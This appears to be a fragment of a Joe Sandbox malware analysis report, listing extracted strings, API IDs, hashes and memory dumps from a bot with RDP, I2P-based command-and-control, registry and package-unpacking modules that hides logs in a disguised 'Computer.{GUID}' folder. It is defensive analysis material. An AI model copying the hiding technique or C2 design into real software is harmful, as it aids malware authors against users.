                                                      • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                                                      • API String ID: 3395718042-1297835036
                                                      • Opcode ID: dc9f842f7eac54993559c7b75295ba2506c030adb8052bc419dc14b215eb191e
                                                      • Instruction ID: c755d2c38d65b6664d4ca67e54b667117767740855da776f1197d8dfd001e252
                                                      • Opcode Fuzzy Hash: dc9f842f7eac54993559c7b75295ba2506c030adb8052bc419dc14b215eb191e
                                                      • Instruction Fuzzy Hash: 3E516E1CB1E60FD5FA225F10A8B03B81291AF53F44FD40876D90E567A3DF6CB885A709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                      • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                                                      • API String ID: 3395718042-190452282
                                                      • Opcode ID: c15513de3634a196f3366f7d1138319d101bf8746a27b5df0d8da0fc0013f9cf
                                                      • Instruction ID: 46e93801eb440d605d715e651c62cc38935eedeb604ed84f5a8ea86696dc9edf
                                                      • Opcode Fuzzy Hash: c15513de3634a196f3366f7d1138319d101bf8746a27b5df0d8da0fc0013f9cf
                                                      • Instruction Fuzzy Hash: F2515420F0E60F97FE209711A5B43B96250AF07F47F554932EB0E467A3DEAEA945C309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                      • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                                                      • API String ID: 3395718042-315528054
                                                      • Opcode ID: 1ced88086860b0335c3687ddabaa48db9f03ae77cfe54b3e4f688aaffc654aeb
                                                      • Instruction ID: 5d3fe4b074189ef14a0ce11669511879d17af9c549cc09791da4c1f4ff46e864
                                                      • Opcode Fuzzy Hash: 1ced88086860b0335c3687ddabaa48db9f03ae77cfe54b3e4f688aaffc654aeb
                                                      • Instruction Fuzzy Hash: 3C516297B1EA07C1FB53A751E4B03BA52D0AF447F8F544132C50E4A7A3DE6CEA45838A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValuefflushfwrite
                                                      • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                      • API String ID: 1980715187-3890537267
                                                      • Opcode ID: d82b60a53b268ca6e58022ac538728e645c6a34c9821543705b62287da690c88
                                                      • Instruction ID: e21eb52b581eace94bdcc4b0de8f8105e77d52683508d874447ae05a239df137
                                                      • Opcode Fuzzy Hash: d82b60a53b268ca6e58022ac538728e645c6a34c9821543705b62287da690c88
                                                      • Instruction Fuzzy Hash: A4A144A8B0E74F91FE229F10B468B7921506F17F45F540532DB1E067D3EE6EA989C309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValuefflushfwrite
                                                      • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                      • API String ID: 1980715187-3890537267
                                                      • Opcode ID: 31996340f94c35ffe3165162bd0582699337a34eaa5e5744c2d59dcda0e096b0
                                                      • Instruction ID: 2ee2c3640e00bb924ffc57f3521de2b64559129b6513db0eb85d339a74249684
                                                      • Opcode Fuzzy Hash: 31996340f94c35ffe3165162bd0582699337a34eaa5e5744c2d59dcda0e096b0
                                                      • Instruction Fuzzy Hash: B2A13F6BB0E78FD5F662DF40F82037822506F06F84E564132C91E46797EE6EE985C30A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValuefflushfwrite
                                                      • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                      • API String ID: 1980715187-3890537267
                                                      • Opcode ID: 486f74fa75455f495f729b84cffc972dde884087864d78dae4b960ba9e6b1242
                                                      • Instruction ID: 4f17942d84e6ca09f0af6b9341abed4f9c2ea959d974b7c8107d2148d12da439
                                                      • Opcode Fuzzy Hash: 486f74fa75455f495f729b84cffc972dde884087864d78dae4b960ba9e6b1242
                                                      • Instruction Fuzzy Hash: B5A14061B0F74B81FA21A700A9603792250AF007F4E540132DA9E06797FF6DE9D5EB9F
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValuefflushfwrite
                                                      • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                      • API String ID: 1980715187-3890537267
                                                      • Opcode ID: 2a0d627020711881d29985d82f55cff846ba4a5cf5951dcfe302d82779e29abf
                                                      • Instruction ID: cda9f6f7f10334bdf8f5f3ea64656ac8bc524a2224b012f1478d63915717e924
                                                      • Opcode Fuzzy Hash: 2a0d627020711881d29985d82f55cff846ba4a5cf5951dcfe302d82779e29abf
                                                      • Instruction Fuzzy Hash: A0A14168B0E71F91FA229F10F4203792250AF02F64F550536C91E267A3EFADB945D70E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValuefflushfwrite
                                                      • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                      • API String ID: 1980715187-3890537267
                                                      • Opcode ID: 4ccf6c6fafd6ef0edcb25c1f4905c0d0115fa185244a2163390da6380f031c66
                                                      • Instruction ID: 36ff49223df7c6c65d8e1aa54218b693f0ff3d68caefddf83df0f3d736b6d4d9
                                                      • Opcode Fuzzy Hash: 4ccf6c6fafd6ef0edcb25c1f4905c0d0115fa185244a2163390da6380f031c66
                                                      • Instruction Fuzzy Hash: F2A178A0B0E74F9BFA609700E4613B962517F43F46F410432DB5E06793EEAFA985E309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValuefflushfwrite
                                                      • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                      • API String ID: 1980715187-3890537267
                                                      • Opcode ID: 347c12ae38df08f32de982b8086dd46448460d65b80159604ddd9383d8eeb33b
                                                      • Instruction ID: 2fb6470819395498962482e76f1bfe82d4d7126c70f126a5c76b4862a5926867
                                                      • Opcode Fuzzy Hash: 347c12ae38df08f32de982b8086dd46448460d65b80159604ddd9383d8eeb33b
                                                      • Instruction Fuzzy Hash: 4FA1306BF0E74785F662BB00E4647B92250AF403E8F540432C95E0A7A7EE6DE985C74F
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorLastThread
                                                      • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                                                      • API String ID: 1689873465-2891999747
                                                      • Opcode ID: f76a8c05245f7f9d028f5976954a85eb74a90b3276b4e61e66dda8879a606635
                                                      • Instruction ID: 6f0d5170e94f9d2eac34f351197d89eaf20436d92403d56d26d33e1531e85441
                                                      • Opcode Fuzzy Hash: f76a8c05245f7f9d028f5976954a85eb74a90b3276b4e61e66dda8879a606635
                                                      • Instruction Fuzzy Hash: AA910F6BB0FA4385FB629B14A8B47B52290AF543F8F500232C59D563E3DF6CE546C34A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$fclosefopenfwrite
                                                      • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                      • API String ID: 608220805-544371937
                                                      • Opcode ID: 9fce181ec319a978e2150695fd8a354e269b163736cb1d300ed70b9f1ac958d1
                                                      • Instruction ID: b45b6ac1487b2bc9b1102e515b6ad654f00b3790bb8be8d6e9769ead675054f2
                                                      • Opcode Fuzzy Hash: 9fce181ec319a978e2150695fd8a354e269b163736cb1d300ed70b9f1ac958d1
                                                      • Instruction Fuzzy Hash: A1519FE1A0865391FA10BB54FD40EF8A261BF58798FC84532DA4E47699EF3CE946C360
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                      • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                      • API String ID: 1104438493-1059260517
                                                      • Opcode ID: fdd1620f7f6c7dc95a89a780df97f5cd85b76bc442082f963a1d3c779d2f4203
                                                      • Instruction ID: d8572bc34b31ffde26c81070c33290318c24bb7eab8065ace0b93477a866a43c
                                                      • Opcode Fuzzy Hash: fdd1620f7f6c7dc95a89a780df97f5cd85b76bc442082f963a1d3c779d2f4203
                                                      • Instruction Fuzzy Hash: 3F716E5BB0E28BC2FF22DF14E4A03B95251AF5AF84F541132D90E467D7DE2DE84A8709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                      • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                      • API String ID: 1104438493-1059260517
                                                      • Opcode ID: 37466eeaf5d3145fe9945981e2911f8d504b80a502f3577bf6a39c079ccfc115
                                                      • Instruction ID: 2e68f719bac5013c4e0f0ad227d0f45d2d442dec217b144b2f5267e35503e62c
                                                      • Opcode Fuzzy Hash: 37466eeaf5d3145fe9945981e2911f8d504b80a502f3577bf6a39c079ccfc115
                                                      • Instruction Fuzzy Hash: B071801BB0E68385FB635B19E4743B91299AF44BF8F940032D94E47397EE3CE945831A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                                                      • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                                                      • API String ID: 3216678114-1460613360
                                                      • Opcode ID: 96bd7c6eba04a360beb0778c3ff0aeb107e1236561809f6db92a680622f1bfc4
                                                      • Instruction ID: 04d6dfa5c56b53a8a2845019aefc66a89720da8f2b73dc2fc3fb8a8cbef50e5b
                                                      • Opcode Fuzzy Hash: 96bd7c6eba04a360beb0778c3ff0aeb107e1236561809f6db92a680622f1bfc4
                                                      • Instruction Fuzzy Hash: CC510AD0E0D60792FE207754BC80BB8D670AF14748FD44532D50F462EADF6DA986D3A2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                                                      • String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                                                      • API String ID: 3066828623-21863935
                                                      • Opcode ID: 7ba6229d510545bc1099f335a41e03444cc33afe3a15cc7e5bdd05c7c464b084
                                                      • Instruction ID: 6b8f8475342ee9f67bb3413c62203b90dcfe6460de8d8dfa2e920a1ae2224ccc
                                                      • Opcode Fuzzy Hash: 7ba6229d510545bc1099f335a41e03444cc33afe3a15cc7e5bdd05c7c464b084
                                                      • Instruction Fuzzy Hash: AC818FA1A0864791FA14AB14FC90BF9A760FF44788FC44132EA4E8769DDF7CE909C760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
